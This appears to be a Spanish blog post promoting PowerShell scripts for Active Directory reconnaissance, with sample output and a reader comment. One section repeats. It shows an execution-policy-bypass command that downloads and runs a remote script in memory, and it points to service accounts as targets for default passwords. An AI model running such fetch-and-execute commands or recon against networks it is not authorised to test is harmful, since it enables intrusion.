Interesante repositorio PowerShell-AD-Recon de PyroTek3 en:
https://github.com/PyroTek3/PowerShell-AD-Recon
El resto del repo tiene otros scripts también muy útiles.
https://github.com/PyroTek3/PowerShell-AD-Recon/blob/master/Discover-PSMSExchangeServers
-Encuentra servidores Exchange
https://github.com/PyroTek3/PowerShell-AD-Recon/blob/master/Find-PSServiceAccounts
-Obtiene una lista de todas las cuentas de servicio. Estas son siempre buenas candidatas para encontrar algunas por defecto.
https://github.com/PyroTek3/PowerShell-AD-Recon/blob/master/Get-PSADForestInfo
-Forest Info
https://github.com/PyroTek3/PowerShell-AD-Recon/blob/master/Discover-PSInterestingServices
-Busca una lista de atributos a lo largo del bosque. Esto llevará un LARGO tiempo en bosques/dominios grandes.
lista por defecto de atributos:
[String[]] $StandardSPNServiceFilter = ("ADAM","AGPM","bo","CESREMOTE","Dfs","DNS","Exchange","FIMService","ftp","http","IMAP",
"ipp","iSCSITarget","kadmin","ldap","MS","sql","nfs","secshd","sip","SMTP","SoftGrid","TERMSRV",
"Virtual","vmrc","vnc","vpn","vssrvc","WSMAN","xmpp"),
Fuente: carnal0wnage
https://github.com/PyroTek3/PowerShell-AD-Recon
C:\temp>powershell -exec bypass -Command "IEX (New-Object
Net.WebClient).DownloadString('https://raw.githubusercontent.com/PyroTek3/PowerShell-AD-Recon/master/Discover-PSMSSQLServers');
Discover-PSMSSQLServers"
Processing XX (user and computer) accounts with MS SQL SPNs discovered in AD Forest DC=UNLUCKY,DC=NET
Domain : UNLUCKY.NET
ServerName : unlucklaptop.unlucky.net
Port :
Instance : SQLEXPRESS
ServiceAccountDN :
OperatingSystem : {Windows 8.1 Enterprise}
OSServicePack :
LastBootup : 1/10/2015 11:47:55 AM
OSVersion : {6.3 (9600)}
Description :
Domain : UNLUCKY.NET
ServerName : unluckserver.unlucky.net
Port : 1433
Instance :
ServiceAccountDN : {CN=Svc-blahblah,OU=Service Accounts,,DC=unlucky,DC=net}
OperatingSystem :
OSServicePack :
LastBootup : 12/31/1600 4:00:00 PM
OSVersion :
Description :
SrvAcctUserID : svc-userid
SrvAcctDescription : ---SNIP---
El resto del repo tiene otros scripts también muy útiles.
https://github.com/PyroTek3/PowerShell-AD-Recon/blob/master/Discover-PSMSExchangeServers
-Encuentra servidores Exchange
https://github.com/PyroTek3/PowerShell-AD-Recon/blob/master/Find-PSServiceAccounts
-Obtiene una lista de todas las cuentas de servicio. Estas son siempre buenas candidatas para encontrar algunas por defecto.
https://github.com/PyroTek3/PowerShell-AD-Recon/blob/master/Get-PSADForestInfo
-Forest Info
https://github.com/PyroTek3/PowerShell-AD-Recon/blob/master/Discover-PSInterestingServices
-Busca una lista de atributos a lo largo del bosque. Esto llevará un LARGO tiempo en bosques/dominios grandes.
lista por defecto de atributos:
[String[]] $StandardSPNServiceFilter = ("ADAM","AGPM","bo","CESREMOTE","Dfs","DNS","Exchange","FIMService","ftp","http","IMAP",
"ipp","iSCSITarget","kadmin","ldap","MS","sql","nfs","secshd","sip","SMTP","SoftGrid","TERMSRV",
"Virtual","vmrc","vnc","vpn","vssrvc","WSMAN","xmpp"),
Fuente: carnal0wnage
buen post, sigue asi amigo
ResponderEliminar